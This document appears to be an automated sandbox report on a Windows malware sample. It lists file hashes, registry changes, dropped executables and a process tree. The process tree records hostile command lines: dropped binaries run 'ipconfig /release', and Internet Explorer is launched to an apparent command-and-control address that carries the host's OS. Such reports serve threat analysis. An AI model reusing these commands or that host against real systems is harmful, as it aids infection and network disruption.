Analysis
-
max time kernel
151s -
max time network
161s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
02-12-2022 21:13
Static task
static1
Behavioral task
behavioral1
Sample
98d70ba57f470df522aca90f49ac112412353900ed9242f131a79bc8c4d5be2d.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
98d70ba57f470df522aca90f49ac112412353900ed9242f131a79bc8c4d5be2d.exe
Resource
win10v2004-20221111-en
General
-
Target
98d70ba57f470df522aca90f49ac112412353900ed9242f131a79bc8c4d5be2d.exe
-
Size
361KB
-
MD5
39695f6fd6d15439e921ec318b7faede
-
SHA1
4f817c4611fbc0e6d52e252411a785d85c37c2da
-
SHA256
98d70ba57f470df522aca90f49ac112412353900ed9242f131a79bc8c4d5be2d
-
SHA512
3930792f714b2bb6f25b2f90692e33091258f3914e14ccb147c43e90b027247ba333e921c52051929eb1f489f9f2e3cc5b70826fc1597871ee0235e60e6a1838
-
SSDEEP
6144:GflfAsiL4lIJjiJcbI03GBc3ucY5DCSjX:GflfAsiVGjSGecvX
Malware Config
Signatures
-
Executes dropped EXE 4 IoCs
pid Process 1984 gzsdwpibvozslexq.exe 1032 CreateProcess.exe 1968 hburlicvse.exe 1956 CreateProcess.exe -
Loads dropped DLL 4 IoCs
pid Process 784 98d70ba57f470df522aca90f49ac112412353900ed9242f131a79bc8c4d5be2d.exe 1984 gzsdwpibvozslexq.exe 1984 gzsdwpibvozslexq.exe 1968 hburlicvse.exe -
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.
pid Process 856 ipconfig.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\IntelliForms iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main IEXPLORE.EXE Set value (int) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\GPU iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\LowRegistry iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Zoom iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000001d2636529ff77848998559c018bb6ff8000000000200000000001066000000010000200000002e396bc3ba63e28ffa46941666b007f1753d95bae8d853c0f0eaa95086a0093b000000000e8000000002000020000000c6be16897ef89530d374a85eb69aceac42ef11ac834e15a0fe45b827427d6b6a900000007811216187666abffd0edfd5667f02d69b71ee4a9b80030ca3a011ea21c0cfb40e64c0e61e8cfb1746d517e27dc439ab1d82e386087433c6b71b61010564acccab5ec9727ca7b971f9bf1721c6740566871500886d5d46d6128229e13386397cb9cae867dd54f51cc1f89c008d6fd5217aadae5d250a504bbb9c0cccb37b18562a42fc3a3771ae858180d0d6a72120784000000089b07d837d06b9a59383cac436443d372d2220bcfbb71c375b85e970b38f4c2b385ed18d4d56e9ba5e4ac259ba4e7af47ea8af243c68944b7489b886703e6d9d iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\IETld\LowMic iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\PageSetup iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch iexplore.exe Set value (int) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{A09FAFA1-74C0-11ED-9C90-C6457FCBF3CF} = "0" iexplore.exe Set value (str) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\InternetRegistry iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb010000001d2636529ff77848998559c018bb6ff8000000000200000000001066000000010000200000008d4e78ec08b39c8f4fb48a108636177d67ba0b90f08fb3fc19f0aac09b4bd86a000000000e8000000002000020000000de95864d89037dc929b1ae276b8bd5d9c595d35ed7878ec78effd0ec5c8b600d2000000015d1662e3c66f3e4d6ec311626aaedb8848d0abbe444c720507370dfeb2db0f64000000090aae01a34fa0514b8079044fdb34dfb45cdf790eb8e3fa47dc638d1edb4ce9b80baeb5faf73fb7ebcdb729153cab08219db78d03b801e80d9a5e8b7067a94c3 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Toolbar iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 800f0790cd08d901 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive iexplore.exe Set value (data) \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 iexplore.exe Key created \REGISTRY\USER\S-1-5-21-999675638-2867687379-27515722-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing iexplore.exe -
Suspicious behavior: EnumeratesProcesses 42 IoCs
pid Process 784 98d70ba57f470df522aca90f49ac112412353900ed9242f131a79bc8c4d5be2d.exe 784 98d70ba57f470df522aca90f49ac112412353900ed9242f131a79bc8c4d5be2d.exe 784 98d70ba57f470df522aca90f49ac112412353900ed9242f131a79bc8c4d5be2d.exe 784 98d70ba57f470df522aca90f49ac112412353900ed9242f131a79bc8c4d5be2d.exe 784 98d70ba57f470df522aca90f49ac112412353900ed9242f131a79bc8c4d5be2d.exe 784 98d70ba57f470df522aca90f49ac112412353900ed9242f131a79bc8c4d5be2d.exe 784 98d70ba57f470df522aca90f49ac112412353900ed9242f131a79bc8c4d5be2d.exe 784 98d70ba57f470df522aca90f49ac112412353900ed9242f131a79bc8c4d5be2d.exe 784 98d70ba57f470df522aca90f49ac112412353900ed9242f131a79bc8c4d5be2d.exe 784 98d70ba57f470df522aca90f49ac112412353900ed9242f131a79bc8c4d5be2d.exe 784 98d70ba57f470df522aca90f49ac112412353900ed9242f131a79bc8c4d5be2d.exe 784 98d70ba57f470df522aca90f49ac112412353900ed9242f131a79bc8c4d5be2d.exe 784 98d70ba57f470df522aca90f49ac112412353900ed9242f131a79bc8c4d5be2d.exe 784 98d70ba57f470df522aca90f49ac112412353900ed9242f131a79bc8c4d5be2d.exe 784 98d70ba57f470df522aca90f49ac112412353900ed9242f131a79bc8c4d5be2d.exe 784 98d70ba57f470df522aca90f49ac112412353900ed9242f131a79bc8c4d5be2d.exe 784 98d70ba57f470df522aca90f49ac112412353900ed9242f131a79bc8c4d5be2d.exe 784 98d70ba57f470df522aca90f49ac112412353900ed9242f131a79bc8c4d5be2d.exe 784 98d70ba57f470df522aca90f49ac112412353900ed9242f131a79bc8c4d5be2d.exe 784 98d70ba57f470df522aca90f49ac112412353900ed9242f131a79bc8c4d5be2d.exe 784 98d70ba57f470df522aca90f49ac112412353900ed9242f131a79bc8c4d5be2d.exe 784 98d70ba57f470df522aca90f49ac112412353900ed9242f131a79bc8c4d5be2d.exe 784 98d70ba57f470df522aca90f49ac112412353900ed9242f131a79bc8c4d5be2d.exe 784 98d70ba57f470df522aca90f49ac112412353900ed9242f131a79bc8c4d5be2d.exe 784 98d70ba57f470df522aca90f49ac112412353900ed9242f131a79bc8c4d5be2d.exe 784 98d70ba57f470df522aca90f49ac112412353900ed9242f131a79bc8c4d5be2d.exe 784 98d70ba57f470df522aca90f49ac112412353900ed9242f131a79bc8c4d5be2d.exe 784 98d70ba57f470df522aca90f49ac112412353900ed9242f131a79bc8c4d5be2d.exe 1984 gzsdwpibvozslexq.exe 1984 gzsdwpibvozslexq.exe 1984 gzsdwpibvozslexq.exe 1984 gzsdwpibvozslexq.exe 1984 gzsdwpibvozslexq.exe 1984 gzsdwpibvozslexq.exe 1984 gzsdwpibvozslexq.exe 1968 hburlicvse.exe 1968 hburlicvse.exe 1968 hburlicvse.exe 1968 hburlicvse.exe 1968 hburlicvse.exe 1968 hburlicvse.exe 1968 hburlicvse.exe -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 460 Process not Found -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1496 iexplore.exe -
Suspicious use of SetWindowsHookEx 6 IoCs
pid Process 1496 iexplore.exe 1496 iexplore.exe 1020 IEXPLORE.EXE 1020 IEXPLORE.EXE 1020 IEXPLORE.EXE 1020 IEXPLORE.EXE -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 784 wrote to memory of 1984 784 98d70ba57f470df522aca90f49ac112412353900ed9242f131a79bc8c4d5be2d.exe 26 PID 784 wrote to memory of 1984 784 98d70ba57f470df522aca90f49ac112412353900ed9242f131a79bc8c4d5be2d.exe 26 PID 784 wrote to memory of 1984 784 98d70ba57f470df522aca90f49ac112412353900ed9242f131a79bc8c4d5be2d.exe 26 PID 784 wrote to memory of 1984 784 98d70ba57f470df522aca90f49ac112412353900ed9242f131a79bc8c4d5be2d.exe 26 PID 784 wrote to memory of 1496 784 98d70ba57f470df522aca90f49ac112412353900ed9242f131a79bc8c4d5be2d.exe 27 PID 784 wrote to memory of 1496 784 98d70ba57f470df522aca90f49ac112412353900ed9242f131a79bc8c4d5be2d.exe 27 PID 784 wrote to memory of 1496 784 98d70ba57f470df522aca90f49ac112412353900ed9242f131a79bc8c4d5be2d.exe 27 PID 784 wrote to memory of 1496 784 98d70ba57f470df522aca90f49ac112412353900ed9242f131a79bc8c4d5be2d.exe 27 PID 1496 wrote to memory of 1020 1496 iexplore.exe 29 PID 1496 wrote to memory of 1020 1496 iexplore.exe 29 PID 1496 wrote to memory of 1020 1496 iexplore.exe 29 PID 1496 wrote to memory of 1020 1496 iexplore.exe 29 PID 1984 wrote to memory of 1032 1984 gzsdwpibvozslexq.exe 31 PID 1984 wrote to memory of 1032 1984 gzsdwpibvozslexq.exe 31 PID 1984 wrote to memory of 1032 1984 gzsdwpibvozslexq.exe 31 PID 1984 wrote to memory of 1032 1984 gzsdwpibvozslexq.exe 31 PID 1968 wrote to memory of 1956 1968 hburlicvse.exe 33 PID 1968 wrote to memory of 1956 1968 hburlicvse.exe 33 PID 1968 wrote to memory of 1956 1968 hburlicvse.exe 33 PID 1968 wrote to memory of 1956 1968 hburlicvse.exe 33
Processes
-
C:\Users\Admin\AppData\Local\Temp\98d70ba57f470df522aca90f49ac112412353900ed9242f131a79bc8c4d5be2d.exe"C:\Users\Admin\AppData\Local\Temp\98d70ba57f470df522aca90f49ac112412353900ed9242f131a79bc8c4d5be2d.exe"1⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:784 -
C:\Temp\gzsdwpibvozslexq.exeC:\Temp\gzsdwpibvozslexq.exe run2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1984 -
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\Temp\hburlicvse.exe ups_run3⤵
- Executes dropped EXE
PID:1032 -
C:\Temp\hburlicvse.exeC:\Temp\hburlicvse.exe ups_run4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1968 -
C:\temp\CreateProcess.exeC:\temp\CreateProcess.exe C:\windows\system32\ipconfig.exe /release5⤵
- Executes dropped EXE
PID:1956 -
C:\windows\system32\ipconfig.exeC:\windows\system32\ipconfig.exe /release6⤵
- Gathers network information
PID:856
-
-
-
-
-
-
C:\Program Files\Internet Explorer\iexplore.exe"C:\Program Files\Internet Explorer\iexplore.exe" http://xytets.com:2345/t.asp?os=home2⤵
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1496 -
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1496 CREDAT:275457 /prefetch:23⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:1020
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD55f97334695332daabb9b8d3ef8ebe300
SHA15653c2ae6538c24a182b7d54a613c8f0fb1aa577
SHA2567df4688536c41159a51589f4b74ad3d4aece527a29f52738e84b985bc2aa8b49
SHA51200229a81826cabe9af5e2e63a7092f9048e762fcdf42f9542a306e88c7755c843fc8032e49bdde3398ac4b5d5a0e0ff3d1c205519860e66d324e97c2354a530e
-
Filesize
3KB
MD55f97334695332daabb9b8d3ef8ebe300
SHA15653c2ae6538c24a182b7d54a613c8f0fb1aa577
SHA2567df4688536c41159a51589f4b74ad3d4aece527a29f52738e84b985bc2aa8b49
SHA51200229a81826cabe9af5e2e63a7092f9048e762fcdf42f9542a306e88c7755c843fc8032e49bdde3398ac4b5d5a0e0ff3d1c205519860e66d324e97c2354a530e
-
Filesize
361KB
MD58be203edfc3f32ab096771791d75d93f
SHA113cd6780d9391afcf2e23e29383d90f65bf14816
SHA256b92319427bd2527e9bd3424fbd877bb71cad92798df971af0e2431175b2edba7
SHA5125cee2321bde993cbfa10d971c23c20fa24ec3978d6c0b50fdf7a2834eae37e54b126dc5c7f713d0f6a8790e44768cbccead5804d4b99c61e190f6beb52cf5f7b
-
Filesize
361KB
MD58be203edfc3f32ab096771791d75d93f
SHA113cd6780d9391afcf2e23e29383d90f65bf14816
SHA256b92319427bd2527e9bd3424fbd877bb71cad92798df971af0e2431175b2edba7
SHA5125cee2321bde993cbfa10d971c23c20fa24ec3978d6c0b50fdf7a2834eae37e54b126dc5c7f713d0f6a8790e44768cbccead5804d4b99c61e190f6beb52cf5f7b
-
Filesize
361KB
MD584ffee277c13c7532dcb929a332ed393
SHA19e6cf848a7fc2cc765f3842ea9ebe5875b6c068b
SHA256131465eed89c7d6f8cff2f4d6024528a7fcaa45acb6bd4a51c0bcbfd9434649d
SHA51233bdd8ba828351c36c54305f89dfc4d210fe8b64fe55569bf143c913a404f1d9976814af7bc57bd3a0bed15e897a898adbeb71f07c7a38669780a067264cd75a
-
Filesize
3KB
MD55f97334695332daabb9b8d3ef8ebe300
SHA15653c2ae6538c24a182b7d54a613c8f0fb1aa577
SHA2567df4688536c41159a51589f4b74ad3d4aece527a29f52738e84b985bc2aa8b49
SHA51200229a81826cabe9af5e2e63a7092f9048e762fcdf42f9542a306e88c7755c843fc8032e49bdde3398ac4b5d5a0e0ff3d1c205519860e66d324e97c2354a530e
-
Filesize
3KB
MD55f97334695332daabb9b8d3ef8ebe300
SHA15653c2ae6538c24a182b7d54a613c8f0fb1aa577
SHA2567df4688536c41159a51589f4b74ad3d4aece527a29f52738e84b985bc2aa8b49
SHA51200229a81826cabe9af5e2e63a7092f9048e762fcdf42f9542a306e88c7755c843fc8032e49bdde3398ac4b5d5a0e0ff3d1c205519860e66d324e97c2354a530e
-
Filesize
3KB
MD55f97334695332daabb9b8d3ef8ebe300
SHA15653c2ae6538c24a182b7d54a613c8f0fb1aa577
SHA2567df4688536c41159a51589f4b74ad3d4aece527a29f52738e84b985bc2aa8b49
SHA51200229a81826cabe9af5e2e63a7092f9048e762fcdf42f9542a306e88c7755c843fc8032e49bdde3398ac4b5d5a0e0ff3d1c205519860e66d324e97c2354a530e
-
Filesize
3KB
MD55f97334695332daabb9b8d3ef8ebe300
SHA15653c2ae6538c24a182b7d54a613c8f0fb1aa577
SHA2567df4688536c41159a51589f4b74ad3d4aece527a29f52738e84b985bc2aa8b49
SHA51200229a81826cabe9af5e2e63a7092f9048e762fcdf42f9542a306e88c7755c843fc8032e49bdde3398ac4b5d5a0e0ff3d1c205519860e66d324e97c2354a530e
-
Filesize
361KB
MD58be203edfc3f32ab096771791d75d93f
SHA113cd6780d9391afcf2e23e29383d90f65bf14816
SHA256b92319427bd2527e9bd3424fbd877bb71cad92798df971af0e2431175b2edba7
SHA5125cee2321bde993cbfa10d971c23c20fa24ec3978d6c0b50fdf7a2834eae37e54b126dc5c7f713d0f6a8790e44768cbccead5804d4b99c61e190f6beb52cf5f7b